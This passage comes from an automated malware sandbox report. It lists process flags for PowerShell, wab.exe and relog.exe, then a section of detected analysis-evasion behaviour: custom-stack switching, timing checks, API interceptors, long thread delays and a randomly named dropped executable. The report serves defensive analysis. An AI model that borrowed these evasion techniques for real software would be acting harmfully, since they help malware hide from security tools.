              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\relog.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 781E158
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 48B4133
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\relog.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD1C0 rdtsc 26_2_21CFD1C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4966Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4927Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6314Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3438Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2804Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4930Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1271Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1723Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5317
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4265
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6494
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2940
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 486
              Source: C:\Windows\SysWOW64\relog.exeWindow / User API: threadDelayed 9903
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 8.8 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.3 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 6314 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 3438 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4320Thread sleep count: 2804 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856Thread sleep count: 4930 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856Thread sleep time: -14790000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856Thread sleep count: 1271 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856Thread sleep time: -3813000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5264Thread sleep time: -20291418481080494s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 6494 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 2940 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7144Thread sleep count: 486 > 30
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136Thread sleep count: 9903 > 30
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136Thread sleep time: -19806000s >= -30000s
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136Thread sleep count: 68 > 30
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136Thread sleep time: -136000s >= -30000s
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624Thread sleep time: -50000s >= -30000s
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624Thread sleep time: -36000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\relog.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\relog.exeLast function: Thread delayed
